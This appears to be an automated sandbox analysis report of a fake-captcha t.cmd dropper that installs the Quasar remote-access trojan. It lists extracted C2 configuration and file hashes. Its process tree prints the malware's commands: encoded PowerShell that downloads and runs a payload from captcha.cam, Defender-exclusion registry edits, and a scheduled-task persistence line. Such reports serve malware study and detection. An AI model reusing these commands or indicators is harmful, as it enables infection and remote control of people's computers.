Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
30/12/2024, 02:02
General
-
Target
https://captcha.cam/t.cmd
Malware Config
Extracted
https://captcha.cam/file.b64
Extracted
quasar
1.4.1
28
194.26.192.167:2768
859d5f90-e2d0-4b2d-ba9f-5371df032ec2
-
encryption_key
BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
RuntimeBroker
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Start PowerShell.
-
Executes dropped EXE 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 41 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://captcha.cam/t.cmd1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb906b46f8,0x7ffb906b4708,0x7ffb906b47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5568 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\t.cmd" "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\Downloads\t.cmd"' -ArgumentList 'am_admin'"3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\t.cmd" am_admin4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\6⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGMAYQBwAHQAYwBoAGEALgBjAGEAbQAvAGYAaQBsAGUALgBiADYANAAiADsAJABiADYANABGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAGYAaQBsAGUALgBiADYANAAiADsAJABlAHgAZQBGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1880 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6692 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6828 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2020,10533643097130953511,3189725836580096261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\t.cmd1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\kpkopw.exe"C:\Windows\System32\kpkopw.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD585ba073d7015b6ce7da19235a275f6da
SHA1a23c8c2125e45a0788bac14423ae1f3eab92cf00
SHA2565ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617
SHA512eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3
-
Filesize
152B
MD57de1bbdc1f9cf1a58ae1de4951ce8cb9
SHA1010da169e15457c25bd80ef02d76a940c1210301
SHA2566e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e
SHA512e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c
-
Filesize
215KB
MD5d79b35ccf8e6af6714eb612714349097
SHA1eb3ccc9ed29830df42f3fd129951cb8b791aaf98
SHA256c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365
SHA512f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a
-
Filesize
336B
MD5e144dd583ed5303b55caadb12edee8ba
SHA1e7e98203aef00acefb754e2b31b2031416b282f2
SHA2569a9344f5ec145c2aa0640a7b1776762058a7b3becf4828699d98414165a57c9e
SHA51239d8289b830fad78c91ea62cd80fbfed4e96b003ea23de58df380837e5d58b7f831c09c7ff96d1243bf486d70f2082196dca5b91b85c80f9bd396645ec5f736d
-
Filesize
2KB
MD56172ec5ecf29d8a97615ec5d1a128a16
SHA175437c6f8185d0508d84f9544170e079f496eb93
SHA25699dc63be680150c3c5c8eb0f57e07b298b462fe2d5be2844ad0deaf232bec235
SHA512810740a5e9644caba6f685625f55f5d2e4c4254fac7c6934abdafa2c3e26f08529a3cc599ffb005a3735e7e61be47afc09995861f1e652f44051a030fa79ea87
-
Filesize
643B
MD50cc71a68130e978558add0c8f7860d16
SHA178efb81d3aeeab14257d808cc6fd2f6e66c6bb85
SHA256b16f159b2a59920cc65870afc9e24af26dab265526df6cd640f7bd9cd3caf554
SHA512ef8b2fb08e4617f46f261cfcac7d0e053e940b04add5080c4566e4c7f629c2071c65473469dc74ef788c4acf152bd136d68644ec635fa069867235470b446b6e
-
Filesize
6KB
MD59acae80b9a350e91b8bf1e835eac3947
SHA14d8b61ab8320cb2f7acbc384ceb2d3d0d910851c
SHA2566b4e47d18cef28bf6e32f45fc13640f14a9df7f8238939e7464408e094895e8e
SHA512ad29d622974916c718d203e28d06971944af10b94d64b1ea7a2d7203aaba1d49f6409791f988086848ce1c356bf65cab1183ebef4b47bf3d25766116690e4b1a
-
Filesize
6KB
MD5e96f0f77065c0ed56905268e29923af3
SHA18fb84ae4984de9e2fbc25ee0a752d0a0b859efe0
SHA256f5edf82d9250b8a415c9edef9c5a39fde44a046f5b70e3e99798d3fd39bd3059
SHA512065b4f58c947e6b2ca5e93114019bbeb1cf0256985811b1c68c3fd4abc8b46620a91fbcd046c16a491187de909c4771d0e50f52f1eb0427602284a5b3d1bf5de
-
Filesize
6KB
MD5680fc2e4385242fd6dd662de71b99813
SHA1f783cbf89e96a9638255c7d93ce95f19542717a5
SHA2568f98f6373b9387a43afcf636081fa0a1a7d4d3762cd8eb5456474a8cfa991991
SHA51270330de8e8f3228475ad5e37da2b450c9883ceb4ab53204c82a8bd94dc7244748dd080112472a3ebee42e0b8e99aba9b5be3cb9a34aa2939c7443dc265f706ee
-
Filesize
5KB
MD5d4019550fc129b3ed755df13bf479786
SHA1b891964eea42fea57eb521050073e44d7140826f
SHA256572e189e64a8379124493672093b5336b9685002e2cb41c14ecfdf4058c64f61
SHA512f52f5d60677957431fc302abc5e9aaa19fcd68072b51e29bc789eaf218749a1e9aaddc9333b6535059cffa7253ae9842694f16795daf9d08111678e72be8b851
-
Filesize
8KB
MD56c7e71a9ad370d1acd71431198d77fa1
SHA106ca4d5b40f8b60193b12a314cd611969ad4a581
SHA25639fd33a794a558923afa282cc835df78356211571958d8ca0cc6d6d1676641dd
SHA51205a6963c0ec1433fb2dca06540a398d937714f1120c2638fc606026e2f802070611c9940d53c7d4399455e00a666c3fc29a80c02f2aec1c3dd30fd921f0afd57
-
Filesize
48B
MD566ef05d870022d03db9bcc02134a4ee3
SHA1fb48c348becd98996274813ce5eab9a60e3686d7
SHA2561cdb09b58d8f9aaabec04184fc8026b240f20ae7c58e0e5a936964b2a8056895
SHA512d312e70b81a82166fffe7361247c9a5050326bfaafe710b3fbcb9d96c619815a5932eff857823396e39f40d8ecd716b5de4660172b0803d2e08aad357fb23ec6
-
Filesize
72B
MD5bbcb66d1ca43c215e3c0b7890d4b7f0b
SHA199463fba558045f239e8c3b965c94f867f79d9a7
SHA2564607f968fc2db193eb74200b1e334b8385ffb35ea47e229519dea5dc37133f13
SHA512f9da8a55a0434631ff34878b71d446357da072744e2d36ef6fcf7f1c96534eb1e0eb8ca3e98facfe6d892bdfc935644e882abcb6229c91ee098844bd94099635
-
Filesize
1KB
MD59671a8f3a8c5801c1dbf456db8c0a40e
SHA1a7e6562aea485951b475e4fa0ccbee2d3f07ef55
SHA25688382121003c2a072f69b89f63c1927e1a05640bfd3c6656e2490606b0eb44d1
SHA512f460624f0ac634c4c92a2b2e66d0206419a1bb9f0caa9d9550fc00b60e3d7a771ee993ac8efb59c3a9049b5470a0717172bb8a80b8208cf4711c30474bf6c979
-
Filesize
539B
MD5e52c86817ac221f93893722906449a2b
SHA14bf815f5e50555dbb8fef85ffd62963fb58f9f7e
SHA256743ea773bd504563eb7bc551a63f30775557d1d09bfe71bb8064d64bf54144b1
SHA512740b91224d0f01cc7b57964037dc3143a4981117e3b00cc80eafd4ef2fa1f6b1855c5000c44e71f7ad85f6966ddfce31027692d5daddd998bc139801841393b7
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5a35b443451a2ce69a1a9036a2cb14508
SHA19df666af80f5696a9b759ccab1a792c4cec1e9c0
SHA256afd3e508c0edf60338b45f7656f13656d0381d945d60a4cde4060100b42134d2
SHA51276a7e4ae8fae55a0a01dcf10bb3110c988aa5cbfd02bc98d675d04b848684a649bc65421b954dda9a016824e8f4d11ded8e8f5bd6d40c5589f5da5f695e3830f
-
Filesize
10KB
MD50e1d258218b50446579671ffd0cda347
SHA1b88fdd7004ad395208cc2ebe990c178a68c6994e
